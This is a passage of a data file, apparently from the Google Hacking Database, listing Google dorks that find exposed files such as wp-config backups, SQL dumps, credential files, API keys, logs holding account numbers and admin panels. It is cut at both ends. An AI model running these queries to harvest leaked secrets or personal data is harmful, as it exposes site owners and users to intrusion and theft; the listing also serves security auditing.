Juicy Info\r\n# Date: 11/09/2023\r\n# Exploit Momin Monis"}, {"dork": "inurl:wp-config.txt intext:mysql", "description": "# Google Dork: inurl:wp-config.txt intext:mysql\r\n# Files Containing Juicy Info\r\n# Date: 11/09/2023\r\n# Exploit s Thakur"}, {"dork": "inurl:/phpMyAdmin/index.php?server=1", "description": "# Google Dork: inurl:/phpMyAdmin/index.php?server=1\r\n# Files Containing Juicy Info\r\n# Date: 11/09/2023\r\n# Exploit Aashiq Ahamed"}, {"dork": "intitle:\"index of\" \".sql\"", "description": "# Google Dork: intitle:\"index of\" \".sql\"\r\n# Files Containing Juicy Info\r\n# Date: 12/09/2023\r\n# Exploit Aashiq Ahamed"}, {"dork": "site: zoom+meeting+passcode", "description": "# Google Dork: site: zoom+meeting+passcode\r\n# Files Containing Juicy Info\r\n# Date: 12/09/2023\r\n# Exploit tarun mahato"}, {"dork": "intitle:\"Documentation Index\" intext:\"Apache Tomcat Servlet\" inurl:\"docs\"", "description": "# Google Dork: intitle:\"Documentation Index\" intext:\"Apache Tomcat Servlet\" inurl:\"docs\"\r\n# Files Containing Juicy Info\r\n# Date: 02/10/2023\r\n# Exploit Nullfuzz"}, {"dork": "intitle:\"index of\" \"npm-debug.log\"", "description": "# Google Dork: intitle:\"index of\" \"npm-debug.log\"\r\n# Files Containing Juicy Info\r\n# Date: 02/10/2023\r\n# Exploit Chinmay Divekar"}, {"dork": "intitle:\"index of\" \"backup.zip\"", "description": "# Google Dork: intitle:\"index of\" \"backup.zip\"\r\n# Files Containing Juicy Info\r\n# Date: 02/10/2023\r\n# Exploit Sachin Gupta"}, {"dork": "intitle:\"index of\" \"creds.txt\"", "description": "# Google Dork: intitle:\"index of\" \"creds.txt\"\r\n# Files Containing Juicy Info\r\n# Date: 02/10/2023\r\n# Exploit Aashiq Ahamed"}, {"dork": "intitle:\"index of\" \"C:Windows\"", "description": "# Google Dork: intitle:\"index of\" \"C:\\Windows\"\r\n# Files Containing Juicy Info\r\n# Date: 02/10/2023\r\n# Exploit Aashiq Ahamed"}, {"dork": "intitle:\"index of\" \"login.php.txt\"", "description": "# Google Dork: intitle:\"index of\" \"login.php.txt\"\r\n# Files Containing Juicy Info\r\n# Date: 02/10/2023\r\n# Exploit Aashiq Ahamed"}, {"dork": "intitle:\"index of\" \"username.txt\"", "description": "# Google Dork: intitle:\"index of\" \"username.txt\"\r\n# Files Containing Juicy Info\r\n# Date: 02/10/2023\r\n# Exploit Ranjeet Jaiswal"}, {"dork": "intitle:\"index of\" \"configuration.txt\"", "description": "# Google Dork: intitle:\"index of\" \"configuration.txt\"\r\n# Files Containing Juicy Info\r\n# Date: 02/10/2023\r\n# Exploit Ranjeet Jaiswal"}, {"dork": "intitle:\"index of\" \"domain.txt\"", "description": "# Google Dork: intitle:\"index of\" \"domain.txt\"\r\n# Files Containing Juicy Info\r\n# Date: 02/10/2023\r\n# Exploit Ranjeet Jaiswal"}, {"dork": "intitle:\"index of\" \"bugs.txt\"", "description": "# Google Dork: intitle:\"index of\" \"bugs.txt\"\r\n# Files Containing Juicy Info\r\n# Date: 02/10/2023\r\n# Exploit Ranjeet Jaiswal"}, {"dork": "intitle:\"index of\" \"postman_collection.json\"", "description": "# Google Dork: intitle:\"index of\" \"postman_collection.json\"\r\n# Files Containing Juicy Info\r\n# Date: 16/10/2023\r\n# Exploit Chinmay Divekar"}, {"dork": "intitle:\"Index of\" inurl:/backup/ \"wp-config\"", "description": "# Google Dork: intitle:\"Index of\" inurl:/backup/ \"wp-config\"\r\n# Files Containing Juicy Info\r\n# Date: 16/10/2023\r\n# Exploit Author: William Bastos"}, {"dork": "intitle:\"index of\" intext: \"login.php\"", "description": "# Google Dork: intitle:\"index of\" intext: \"login.php\"\r\n# Files Containing Juicy Info\r\n# Date: 16/10/2023\r\n# Exploit Avdhut Hadkar"}, {"dork": "site:.com inurl:/signup.aspx", "description": "# Google Dork: site:.com inurl:/signup.aspx\r\n# Files Containing Juicy Info\r\n# Date: 16/10/2023\r\n# Exploit Mayuresh Gadhekar"}, {"dork": "inurl:\"/login.php\" intitle:\"admin\"", "description": "# Google Dork: inurl:\"/login.php\" intitle:\"admin\"\r\n# Files Containing Juicy Info\r\n# Date: 16/10/2023\r\n# Exploit Aashiq Ahamed"}, {"dork": "site:linkedin.com intitle:\"@gmail\"", "description": "# Google Dork: site:linkedin.com intitle:\"@gmail\"\r\n# Files Containing Juicy Info\r\n# Date: 16/10/2023\r\n# Exploit Shiva Medituru"}, {"dork": "\"-- phpMyAdmin SQL Dump\" ext:txt", "description": "# Google Dork: \"-- phpMyAdmin SQL Dump\" ext:txt\r\n# Files Containing Juicy Info\r\n# Date: 18/10/2023\r\n# Exploit Reza Abasi"}, {"dork": "intitle:index.of intext:log site:.bd", "description": "# Google Dork: intitle:index.of intext:log site:.bd\r\n# Files Containing Juicy Info\r\n# Date:18/10/2023\r\n# Exploit Author: Khandaker Mahidul Islam"}, {"dork": "index of /wp-admin.jpg site:bd", "description": "# Google Dork: index of /wp-admin.jpg site:bd\r\n# Files Containing Juicy Info\r\n# Date:19/10/2023\r\n# Exploit Author: Rezwan Ahmed"}, {"dork": "intitle:\"Error log for /LM/\".edu", "description": "# Google Dork : intitle:\"Error log for /LM/\".edu\r\n# Category : Files Containing Juicy Info\r\n# Date : 19/10/2023\r\n# Author : Neyamul Haque"}, {"dork": "Fwd: intitle:\"index of\" \"login\" site:bd", "description": "# Google Dork: intitle:\"index of\" \"login\" site:bd\r\n# Files Containing Juicy Info\r\n# Date:20/10/2023\r\n# Exploit Author: Faridul Hasan"}, {"dork": "Fwd: Google Dork: inurl:login/login-user", "description": "# Google Dork: inurl:login/login-user\r\n# Files Containing Juicy Info\r\n# Date:01/08/2023\r\n# Exploit Author: Faridul Hasan"}, {"dork": "intitle:\"index of\" \"/userlist/\"", "description": "# Google Dork: intitle:\"index of\" \"/userlist/\"\r\n# Files Containing Juicy Info\r\n# Date: 20/10/2023\r\n# Exploit Author: Md.Tariqul Islam Hasanat"}, {"dork": "inurl:\"xslt?PAGE=C_4_0\"", "description": "# Google Dork: inurl:\"xslt?PAGE=C_4_0\"\r\n# Files Containing Juicy Info\r\n# Date: 20/10/2023\r\n# Exploit Reza Abasi"}, {"dork": "intitle:\"index of\" \"about-me\"", "description": "# Google Dork: intitle:\"index of\" \"about-me\"\r\n# Files Containing Juicy Info\r\n# Date: 23/10/2023\r\n# Exploit Safein Sadad"}, {"dork": "\"index of\" \"cloudapp.azure.com\"", "description": "# Google Dork: \"index of\" \"cloudapp.azure.com\"\r\n# Files Containing Juicy Info\r\n# Date: 23/10/2023\r\n# Exploit Sibi Mathew George"}, {"dork": "\"index of\" \"cloudapp.net\"", "description": "# Google Dork: \"index of\" \"cloudapp.net\"\r\n# Files Containing Juicy Info\r\n# Date: 23/10/2023\r\n# Exploit Sibi Mathew George"}, {"dork": "Google Dorks", "description": "# Google Dork: intitle:index.of \"config.inc.php\"\r\n# Files Containing Juicy Info\r\n# Date: 25/10/2023\r\n# Exploit Shubhranshu Gorai"}, {"dork": "site:www.openbugbounty.org intext:\"xss\" intext:\"Unpatched\"", "description": "# Google Dork: site:www.openbugbounty.org intext:\"xss\" intext:\"Unpatched\"\r\n# Files Containing Juicy Info\r\n# Date: 25/10/2023\r\n# Exploit Sachin Gupta"}, {"dork": "site:.co.in intitle:index of /wp-admin", "description": "# Google Dork: site:.co.in intitle:index of /wp-admin\r\n# Files Containing Juicy Info\r\n# Date: 25/10/2023\r\n# Exploit Sachin Gupta"}, {"dork": "intitle:index.of login.js", "description": "# Google Dork: intitle:index.of login.js\r\n# Files Containing Juicy Info\r\n# Date: 30/10/2023\r\n# Exploit Varad Vaidya"}, {"dork": "site:.com intitle:\"index of\" /mobikwike", "description": "# Google Dork: site:.com intitle:\"index of\" /mobikwike\r\n# Files Containing Juicy Info\r\n# Date: 30/10/2023\r\n# Exploit Husain Ahmad"}, {"dork": "Submiting a google dork.", "description": "# Google Dork: site:.com inurl:/pass-aspx.\r\n# Files Containing Juicy Info\r\n# Date: 30/10/2023\r\n# Exploit swara kalsekar"}, {"dork": "New submission", "description": "# Google Dork: inurl: .git\r\n# Files Containing Juicy Info\r\n# Date: 30/10/2023\r\n# Exploit Jai kumar"}, {"dork": "site:.com intitle:\"index of\"/sbi", "description": "# Google Dork: site:.com intitle:\"index of\"/sbi\r\n# Files Containing Juicy Info\r\n# Date: 30/10/2023\r\n# Exploit Husain Ahmad"}, {"dork": "site:.com intitle:\"index of\"/csb", "description": "# Google Dork: site:.com intitle:\"index of\"/csb\r\n# Files Containing Juicy Info\r\n# Date: 30/10/2023\r\n# Exploit Husain Ahmad"}, {"dork": "\"structure\" + ext:sql", "description": "# Google Dork: \"structure\" + ext:sql\r\n# Files Containing Juicy Info\r\n# Date: 30/10/2023\r\n# Exploit chum1ng0"}, {"dork": "intitle:\"index of\" \"/config/prod/\"", "description": "# Google Dork: intitle:\"index of\" \"/config/prod/\"\r\n# Files Containing Juicy Info\r\n# Date: 30/10/2023\r\n# Exploit Suprit Pandurangi"}, {"dork": "Reporting a New Google Dork : intitle: \"index of\" administrator", "description": "# Google Dork: intitle: \"index of\" administrator\r\n# Files Containing Juicy Info\r\n# Date: 31/10/2023\r\n# Exploit Rahul Thakur"}, {"dork": "Reporting a New Google Dork : intitle:\"index of\" mysql inurl:./db/", "description": "# Google Dork: intitle:\"index of\" mysql inurl:./db/\r\n# Files Containing Juicy Info\r\n# Date: 31/10/2023\r\n# Exploit Rahul Thakur"}, {"dork": "Reporting a New Google Dork: intitle:index.of./.database", "description": "# Google Dork: intitle:index.of./.database\r\n# Files Containing Juicy Info\r\n# Date: 31/10/2023\r\n# Exploit Rahul Thakur"}, {"dork": "intext:\"index of\" \"phpinfo\" site:*.in", "description": "# Google Dork: intext:\"index of\" \"phpinfo\" site:*.in\r\n# Files Containing Juicy Info\r\n# Date: 31/10/2023\r\n# Exploit Soriful Islam"}, {"dork": "Fwd: site:.co.in intitle:index of /wp-admin", "description": "# Google Dork: intitle:index of /wp-admin\r\n# Files Containing Juicy Info\r\n# Date: 31/10/2023\r\n# Exploit Sachin Gupta"}, {"dork": "Re: site:www.openbugbounty.org intext:\"xss\" intext:\"Unpatched\"", "description": "# Google Dork: intext:\"xss\" intext:\"Unpatched\"\r\n# Files Containing Juicy Info\r\n# Date: 31/10/2023\r\n# Exploit Sachin Gupta"}, {"dork": "inurl:\"/cgi-bin/home.ha\"", "description": "# Google Dork: inurl:\"/cgi-bin/home.ha\"\r\n# Files Containing Juicy Info\r\n# Date: 31/10/2023\r\n# Exploit: Louise E"}, {"dork": "Open API Keys", "description": "# Google Dork: (\"_API_KEY=\"sk-\")\r\n# Files Containing Juicy Info\r\n# Date: 01/11/2023\r\n# Exploit: Teddy"}, {"dork": "intitle:index of \"main.js\"", "description": "# Google Dork: intitle:index of \"main.js\"\r\n# Files Containing Juicy Info\r\n# Date: 01/11/2023\r\n# Exploit: Riya Gupta"}, {"dork": "Firewall Log Google Dork Submission", "description": "# Google Dork: \"index of\" \"firewall.log\" | \"firewall.logs\"\r\n# Files Containing Juicy Info\r\n# Date: 01/11/2023\r\n# Exploit: NITYA NAND JHA"}, {"dork": "AWS Cloud Hosted Login Pages", "description": "# Google Dork: AWS Cloud Hosted Login Pages\r\n# Files Containing Juicy Info\r\n# Date: 01/11/2023\r\n# Exploit: Prathamesh Kamble"}, {"dork": "intitle:\"Index of /databases\"", "description": "# Google Dork: intitle:\"Index of /databases\"\r\n# Files Containing Juicy Info\r\n# Date: 01/11/2023\r\n# Exploit: Sayed Recover"}, {"dork": "inurl: \"index of\" \"phpstan.neon\"", "description": "# Google Dork: inurl: \"index of\" \"phpstan.neon\"\r\n# Files Containing Juicy Info\r\n# Date: 01/11/2023\r\n# Exploit: Mark Ivan David"}, {"dork": "intitle:\"Index of /_MACOSX\"", "description": "# Google Dork: intitle:\"Index of /_MACOSX\"\r\n# Files Containing Juicy Info\r\n# Date: 02/11/2023\r\n# Exploit: Kamran Saifullah"}, {"dork": "intitle:\"Index of /vendor/guzzlehttp\"", "description": "# Google Dork: intitle:\"Index of /vendor/guzzlehttp\"\r\n# Files Containing Juicy Info\r\n# Date: 02/11/2023\r\n# Exploit: Kamran Saifullah"}, {"dork": "intitle:\"Index of /flipbook\"", "description": "# Google Dork: intitle:\"Index of /flipbook\"\r\n# Files Containing Juicy Info\r\n# Date: 02/11/2023\r\n# Exploit: Kamran Saifullah"}, {"dork": "intitle:\"Index of /app/webroot/img\"", "description": "# Google Dork: intitle:\"Index of /app/webroot/img\"\r\n# Files Containing Juicy Info\r\n# Date: 02/11/2023\r\n# Exploit: Kamran Saifullah"}, {"dork": "intitle:\"Index of /wp-includes/sitemaps\"", "description": "# Google Dork: intitle:\"Index of /wp-includes/sitemaps\"\r\n# Files Containing Juicy Info\r\n# Date: 02/11/2023\r\n# Exploit: Kamran Saifullah"}, {"dork": "intitle:\"Index of /biuro\"", "description": "# Google Dork: intitle:\"Index of /biuro\"\r\n# Files Containing Juicy Info\r\n# Date: 02/11/2023\r\n# Exploit: Kamran Saifullah"}, {"dork": "intitle:\"Index of /node_modules/\"", "description": "# Google Dork: intitle:\"Index of /node_modules/\"\r\n# Files Containing Juicy Info\r\n# Date: 02/11/2023\r\n# Exploit: Kamran Saifullah"}, {"dork": "intitle:\"Index of /node\"", "description": "# Google Dork: intitle:\"Index of /node\"\r\n# Files Containing Juicy Info\r\n# Date: 02/11/2023\r\n# Exploit: Kamran Saifullah"}, {"dork": "intitle:\"index of\" \"plesk-stat\"", "description": "# Google Dork: intitle:\"index of\" \"plesk-stat\"\r\n# Files Containing Juicy Info\r\n# Date: 02/11/2023\r\n# Exploit: Praharsh Kumar Singh"}, {"dork": "Re: New Dork Submission for Google Hacking Database !!", "description": "# Google Dork: \"intitle:index of wp-content/plugins/wp-mail-smtp/\"\r\n# Files Containing Juicy Info\r\n# Date: 02/11/2023\r\n# Exploit: Ishwar Kumar"}, {"dork": "inurl:/admin.php", "description": "# Google Dork: inurl:/admin.php\r\n# Files Containing Juicy Info\r\n# Date: 02/11/2023\r\n# Exploit: Aashiq Ahamed"}, {"dork": "intext:\"index of wp-content/uploads\"", "description": "# Google Dork: intext:\"index of wp-content/uploads\"\r\n# Files Containing Juicy Info\r\n# Date: 02/11/2023\r\n# Exploit: Muhammad Abrar"}, {"dork": "intitle:\"index of\" ec2 -aws", "description": "# Google Dork: intitle:\"index of\" ec2 -aws\r\n# Files Containing Juicy Info\r\n# Date: 02/11/2023\r\n# Exploit: Esteban Brenes Segura"}, {"dork": "intitle:\"index of\" graphql-api", "description": "# Google Dork: intitle:\"index of\" graphql-api\r\n# Files Containing Juicy Info\r\n# Date: 02/11/2023\r\n# Exploit: Esteban Brenes Segura"}, {"dork": "Google Docs data breach through dorks", "description": "# Google Dork: site:docs.google.com inurl:spreadsheets/d/ intitle:\"QUERY\"\r\n# Files Containing Juicy Info\r\n# Date: 02/11/2023\r\n# Exploit: Jowin John Chemban"}, {"dork": "Google Dork: inurl:\"/bitrix/redirect.php?goto=\"", "description": "# Google Dork: inurl:\"/bitrix/redirect.php?goto=\"\r\n# Files Containing Juicy Info\r\n# Date: 02/11/2023\r\n# Exploit: Kurmasheva Tatiana"}, {"dork": "KCFinder Google Dork", "description": "# Google Dork: intitle:KCFinder: /files inurl:/kcfinder/browse.php\r\n# Files Containing Juicy Info\r\n# Date: 06/11/2023\r\n# Exploit: Hur Vzee"}, {"dork": "Plone installation files", "description": "# Google Dork: intitle:\"Index of\" intext:\"Plone\" AND (\"migration.log\" OR \"error_log\" OR \"error.log\" OR \"z2.log\" OR \"debug.log\" OR \"Unauthorized.png\" OR \"error\" OR \"passwd\" OR \"htpasswd\" OR \".gitignore\" OR \"debug\")\r\n# Files Containing Juicy Info\r\n# Date: 06/11/2023\r\n# Exploit: Nayab Keshodwala"}, {"dork": "Concrete5 CMS files", "description": "# Google Dork: intitle:\"Index of\" inurl:/concrete5/\r\n# Files Containing Juicy Info\r\n# Date: 06/11/2023\r\n# Exploit: Nayab Keshodwala"}, {"dork": "intitle:\"index of\" \"*robots.txt\" site:.edu", "description": "# Google Dork: intitle:\"index of\" \"*robots.txt\" site:.edu\r\n# Files Containing Juicy Info\r\n# Date: 07/11/2023\r\n# Exploit: Safein Sadad"}, {"dork": "inurl:\"/database.json\"", "description": "# Google Dork: inurl:\"/database.json\"\r\n# Files Containing Juicy Info\r\n# Date: 07/11/2023\r\n# Exploit Author: Raouf"}, {"dork": "inurl: edu + site: admin", "description": "# Google Dork: inurl: edu + site: admin\r\n# Files Containing Juicy Info\r\n# Date: 08/11/2023\r\n# Exploit: Anand J Nair"}, {"dork": "intext:\"index of\" \"infophp()\"", "description": "# Google Dork: intext:\"index of\" \"infophp()\"\r\n# Files Containing Juicy Info\r\n# Date: 08/11/2023\r\n# Exploit Author: Praharsh Kumar Singh"}, {"dork": "intitle:\"index of\" \"secret.txt\"", "description": "# Google Dork: intitle:\"index of\" \"secret.txt\"\r\n# Files Containing Juicy Info\r\n# Date: 08/11/2023\r\n# Exploit: Aashiq Ahamed"}, {"dork": "intitle:\"index of\" \"config.php.txt\"", "description": "# Google Dork: intitle:\"index of\" \"config.php.txt\"\r\n# Files Containing Juicy Info\r\n# Date: 08/11/2023\r\n# Exploit: Aashiq Ahamed"}, {"dork": "inurl:adminpanel site:*.* -site:github.com", "description": "# Google Dork: inurl:adminpanel site:*.* -site:github.com\r\n# Files Containing Juicy Info\r\n# Date: 08/11/2023\r\n# Exploit Author: Anas Zakir"}, {"dork": "site:login.*.* | site:portal.*.*", "description": "# Google Dork: site:login.*.* | site:portal.*.*\r\n# Files Containing Juicy Info\r\n# Date: 08/11/2024\r\n# Exploit Author: Anas Zakir"}, {"dork": "intitle:\"index of \" *.js\"", "description": "# Google Dork: intitle:\"index of \" *.js\"\r\n# Files Containing Juicy Info\r\n# Date: 09/11/2023\r\n# Exploit: Jitendra Behera"}, {"dork": "inurl:pastebin \"VISA\"", "description": "# Google Dork: inurl:pastebin \"VISA\"\r\n# Files Containing Juicy Info\r\n# Date: 10/11/2023\r\n# Exploit: Abhishek Patel"}, {"dork": "Google Dork", "description": "# Google Dork: site:.org.in intitle:index of /wp-admin\r\n# Files Containing Juicy Info\r\n# Date: 10/11/2023\r\n# Exploit: Ritik Singh"}, {"dork": "intitle:\"index of\" private", "description": "# Google Dork: intitle:\"index of\" private\r\n# Files Containing Juicy Info\r\n# Date: 10/11/2023\r\n# Exploit: slacker pwns"}, {"dork": "intitle:\"index of\"Eventlog Analyzer", "description": "# Google Dork: intitle:\"index of\"Eventlog Analyzer\r\n# Files Containing Juicy Info\r\n# Date: 17/11/2023\r\n# Exploit: Connect2maviya"}, {"dork": "intitle:\"index of\" \"wp-config.php.old\" | \"wp-config.php.backup\"", "description": "# Google Dork: intitle:\"index of\" \"wp-config.php.old\" | \"wp-config.php.backup\"\r\n# Files Containing Juicy Info\r\n# Date: 17/11/2023\r\n# Exploit: Qais Qais"}, {"dork": "intitle:\"index of\" inurl:/config/", "description": "# Google Dork: intitle:\"index of\" inurl:/config/\r\n# Files Containing Juicy Info\r\n# Date: 17/11/2023\r\n# Exploit: Qais Qais"}, {"dork": "New google dork for bitcoin - Saleh Lardhi", "description": "# Google Dork: \"index of\" \"./\" \"./bitcoin\"\r\n# Files Containing Juicy Info\r\n# Date: 17/11/2023\r\n# Exploit: Saleh Lardhi"}, {"dork": "inurl:signup | inurl:sign-up | inurl:register | inurl:registration", "description": "# Google Dork: inurl:signup | inurl:sign-up | inurl:register | inurl:registration\r\n# Files Containing Juicy Info\r\n# Date: 17/11/2023\r\n# Exploit: Qais Qais"}, {"dork": "site:*.edu.* inurl:globalprotect", "description": "# Google Dork: site:*.edu.* inurl:globalprotect\r\n# Files Containing Juicy Info\r\n# Date: 17/11/2023\r\n# Exploit: Connect2maviya"}, {"dork": "inurl:\"/wp-content/debug.log\"", "description": "# Google Dork: inurl:\"/wp-content/debug.log\"\r\n# Files Containing Juicy Info\r\n# Date: 20/11/2023\r\n# Exploit: Sathish Kishore"}, {"dork": "inurl:\"/wp-includes/user.php\" -site:wordpress.org -site:github.com -site:fossies.org", "description": "# Google Dork: inurl:\"/wp-includes/user.php\" -site:wordpress.org -site:github.com -site:fossies.org\r\n# Files Containing Juicy Info\r\n# Date: 20/11/2023\r\n# Exploit: Sathish Kishore"}, {"dork": "allinurl:\"add_vhost.php?lang=english\"", "description": "# Google Dork: allinurl:\"add_vhost.php?lang=english\"\r\n# Files Containing Juicy Info\r\n# Date: 20/11/2023\r\n# Exploit: Saleh Lardhi"}, {"dork": "New GHDB Submission: Site Backup Index Exposure", "description": "# Google Dork: intitle:\"index of\" \"site backup\"\r\n# Files Containing Juicy Info\r\n# Date: 20/11/2023\r\n# Exploit: Nyambi Blaise"}, {"dork": "filetype:txt CLAVE*.txt OR clave*.txt", "description": "# Google Dork: filetype:txt CLAVE*.txt OR clave*.txt\r\n# Files Containing Juicy Info\r\n# Date: 23/11/2023\r\n# Exploit: Kevin Tupiza"}, {"dork": "intext:\"Reportico\" site:.com OR site:.org OR site:.net OR site:.gov OR site:.edu", "description": "# Google Dork: intext:\"Reportico\" site:.com OR site:.org OR site:.net OR site:.gov OR site:.edu\r\n# Files Containing Juicy Info\r\n# Date: 23/11/2023\r\n# Exploit: Aashiq Ahamed"}, {"dork": "site:*.ac.* intitle:\"index of\" *.ics", "description": "# Google Dork: site:*.ac.* intitle:\"index of\" *.ics\r\n# Files Containing Juicy Info\r\n# Date: 23/11/2023\r\n# Exploit: Connect2maviya"}, {"dork": "site:*.edu.* intitle:\"index of\" *.ics", "description": "# Google Dork: site:*.edu.* intitle:\"index of\" *.ics\r\n# Files Containing Juicy Info\r\n# Date: 23/11/2023\r\n# Exploit: Connect2maviya"}, {"dork": "site:s3.amazonaws.com \"index of /\"", "description": "# Google Dork: site:s3.amazonaws.com \"index of /\"\r\n# Files Containing Juicy Info\r\n# Date: 24/11/2023\r\n# Exploit: Jessar Qais"}, {"dork": "intitle:\"WAMPSERVER Homepage\"", "description": "# Google Dork: intitle:\"WAMPSERVER Homepage\"\r\n# Files Containing Juicy Info\r\n# Date: 27/11/2023\r\n# Exploit Author: Saleh Lardhi"}, {"dork": "inurl: /adminer.php", "description": "# Google Dork: inurl: /adminer.php\r\n# Files Containing Juicy Info\r\n# Date: 27/11/2023\r\n# Exploit: Satyam Singh"}, {"dork": "site:*.com */admin.txt", "description": "# Google Dork: site:*.com */admin.txt\r\n# Files Containing Juicy Info\r\n# Date: 27/11/2023\r\n# Exploit: saurabh kode"}, {"dork": "intext:\"index of\" \"pins\" site:*.com", "description": "# Google Dork: intext:\"index of\" \"pins\" site:*.com\r\n# Files Containing Juicy Info\r\n# Date: 27/11/2023\r\n# Exploit: Omkar Chavan"}, {"dork": "intitle:index.of /logs.txt", "description": "# Google Dork: intitle:index.of /logs.txt\r\n# Files Containing Juicy Info\r\n# Date: 27/11/2023\r\n# Exploit: saurabh kode"}, {"dork": "filetype:log intext:\"Account Number\"", "description": "# Google Dork: filetype:log intext:\"Account Number\"\r\n# Files Containing Juicy Info\r\n# Date: 29/11/2023\r\n# Exploit: Noor Alhomeed"}, {"dork": "Submission of New Google Dork", "description": "# Google Dork: intitle:\"Index of\" inurl:apache2.conf\r\n# Files Containing Juicy Info\r\n# Date: 30/11/2023\r\n# Exploit: shar0548"}, {"dork": "site:.edu intext:\"robotics\" inurl:/research", "description": "# Google Dork: site:.edu intext:\"robotics\" inurl:/research\r\n# Files Containing Juicy Info\r\n# Date: 30/11/2023\r\n# Exploit: Chunfeng Huang"}, {"dork": "inurl:.\"install.appcenter.ms/orgs/\"", "description": "# Google Dork: inurl:.\"install.appcenter.ms/orgs/\"\r\n# Files Containing Juicy Info\r\n# Date: 30/11/2023\r\n# Exploit: Kamran Saifullah"}, {"dork": "inurl:typo3/index.php", "description": "# Google Dork: inurl:typo3/index.php\r\n# Files Containing Juicy Info\r\n# Date: 30/11/2023\r\n# Exploit: Appsec Jay"}, {"dork": "site:*.ac.* filetype:template", "description": "# Google Dork: site:*.ac.* filetype:template\r\n# Files Containing Juicy Info\r\n# Date: 30/11/2023\r\n# Exploit: Connect2maviya"}, {"dork": "site:*.edu.* filetype:template", "description": "# Google Dork: site:*.edu.* filetype:template\r\n# Files Containing Juicy Info\r\n# Date: 30/11/2023\r\n# Exploit: Connect2maviya"}, {"dork": "intitle:\"index of\" \"configuration.php\"", "description": "# Google Dork: intitle:\"index of\" \"configuration.php\"\r\n# Files Containing Juicy Info\r\n# Date: 01/12/2023\r\n# Exploit: saurabh kode"}, {"dork": "intext:\"index of\" server.conf", "description": "# Google Dork: intext:\"index of\" server.conf\r\n# Files Containing Juicy Info\r\n# Date: 04/12/2023\r\n# Exploit: saurabh kode"}, {"dork": "site:*.* inurl:php_error.log - Sensitive information disclosure", "description": "# Google Dork: site:*.* inurl:php_error.log - Sensitive information disclosure\r\n# Files Containing Juicy Info\r\n# Date: 04/12/2023\r\n# Exploit: Shiva Medituru"}, {"dork": "site:*.*.* intitle:\"index of\" *.pcapng", "description": "# Google Dork: site:*.*.* intitle:\"index of\" *.pcapng\r\n# Files Containing Juicy Info\r\n# Date: 04/12/2023\r\n# Exploit: Connect2maviya"}, {"dork": "inurl:/HappyAxis.jsp", "description": "# Google Dork: inurl:/HappyAxis.jsp\r\n# Files Containing Juicy Info\r\n# Date: 06/12/2023\r\n# Exploit: Aashiq Ahamed"}, {"dork": "intext:\"index of\"store", "description": "# Google Dork: intext:\"index of\"store\r\n# Files Containing Juicy Info\r\n# Date: 06/12/2023\r\n# Exploit: saurabh kode"}, {"dork": "intitle:index of db.py", "description": "# Google Dork: intitle:index of db.py\r\n# Files Containing Juicy Info\r\n# Date: 11/12/2023\r\n# Exploit: Amit Adhikari"}, {"dork": "intext:\"index of\" app", "description": "# Google Dork: intext:\"index of\" app\r\n# Files Containing Juicy Info\r\n# Date: 11/12/2023\r\n# Exploit: Amit Adhikari"}, {"dork": "site:id filetype:sql", "description": "# Google Dork: site:id filetype:sql\r\n# Files Containing Juicy Info\r\n# Date: 11/12/2023\r\n# Exploit: Bambang Sutrisna"}, {"dork": "intext:\"administrator\" filetype:txt intext:\"account\" inurl:/admin , intext:\"administrator\" filetype:txt intext:\"account\" allinurl:", "description": "# Google Dork: intext:\"administrator\" filetype:txt intext:\"account\" inurl:/admin , intext:\"administrator\" filetype:txt intext:\"account\" allinurl:\r\n# Files Containing Juicy Info\r\n# Date: 11/12/2023\r\n# Exploit: Skidrow"}, {"dork": "intitle:\"phpinfo\" site:*.com.* intext:\"HTTP_HOST\"", "description": "# Google Dork: intitle:\"phpinfo\" site:*.com.* intext:\"HTTP_HOST\"\r\n# Files Containing Juicy Info\r\n# Date: 11/12/2023\r\n# Exploit: J. Daniel Elias Valdez"}, {"dork": "GHDB submissions -1", "description": "# Google Dork: intitle: \"/userfiles'\"\"\r\n# Files Containing Juicy Info\r\n# Date: 12/12/2023\r\n# Exploit: Ajay Naik"}, {"dork": "intitle:\"Index of\" intext:\"config\" site:*.com.*", "description": "#Google Dork:intitle:\"Index of\" intext:\"config\" site:*.com.*\r\n#Files Containing Juicy Info\r\n#Date: 12/12/2023\r\n#Exploit Daniel E.V."}, {"dork": "intext:\"userfiles\" intitle:\"Index Of\" site:*.com.*", "description": "#Google Dork:intext:\"userfiles\" intitle:\"Index Of\" site:*.com.*\r\n#Files Containing Juicy Info\r\n#Date: 14/12/2023\r\n#Exploit Daniel E.V."}, {"dork": "intitle:\"Index of\" intext:\"php\" site:*.com.*", "description": "# Google Dork: intitle:\"Index of\" intext:\"php\" site:*.com.*\r\n# Files Containing Juicy Info\r\n# Date: 14/12/2023\r\n# Exploit: saurabh kode"}, {"dork": "Google dorks", "description": "# Google Dork: site:\"*.edu\" intitle:\"index of\"|\"*.json\"\r\n# Files Containing Juicy Info\r\n# Date: 15/12/2023\r\n# Exploit: Abdulmalik Alharbi"}, {"dork": "Google Dork", "description": "# Google Dork: inurl index.php id= site.bd\r\n# Files Containing Juicy Info\r\n# Date: 18/12/2023\r\n# Exploit: Abdulkarim Alsabilah"}, {"dork": "site:.com \"index of docker\"", "description": "# Google Dork: site:.com \"index of docker\"\r\n# Files Containing Juicy Info\r\n# Date: 21/12/2023\r\n# Exploit: Bambang Sutrisna"}, {"dork": "intext:\"user\" filetype:php intext:\"account\" inurl:/admin", "description": "# Google Dork: intext:\"user\" filetype:php intext:\"account\" inurl:/admin\r\n# Files Containing Juicy Info\r\n# Date: 21/12/2023\r\n# Exploit: saurabh kode"}, {"dork": "inurl:\"?url=http\"", "description": "# Google Dork:inurl:\"?url=http\"\r\n# Files Containing Juicy Info\r\n# Date: 21/12/2023\r\n# Exploit: Jeel Patel"}, {"dork": "intitle:\"Fleet Management Portal\"", "description": "# Google Dork: intitle:\"Fleet Management Portal\"\r\n# Files Containing Juicy Info\r\n# Date: 21/12/2023\r\n# Exploit Kamran Saifullah"}, {"dork": "filetype:reg reg HKEY_CURRENT_USER SSHHOSTKEYS", "description": "# Google Dork: inurl:/.well-known/ai-plugin.json\r\n# Files Containing Juicy Info\r\n# Date: 30/11/2023\r\n# Exploit: Mohamed Choukrate"}, {"dork": "(site:jsonformatter.org | site:codebeautify.org) & (intext:aws | intext:bucket | intext:password | intext:secret | intext:username)", "description": "# Google Dork: (site:jsonformatter.org | site:codebeautify.org) &\r\n(intext:aws | intext:bucket | intext:password | intext:secret |\r\nintext:username)\r\n# Files Containing Juicy Info\r\n# Date: 03/01/2024\r\n# Exploit: letmewin"}, {"dork": "ext:java intext:\"executeUpdate\"", "description": "# Exploit Title: Sensitive data in java files\r\n# Google Dork: 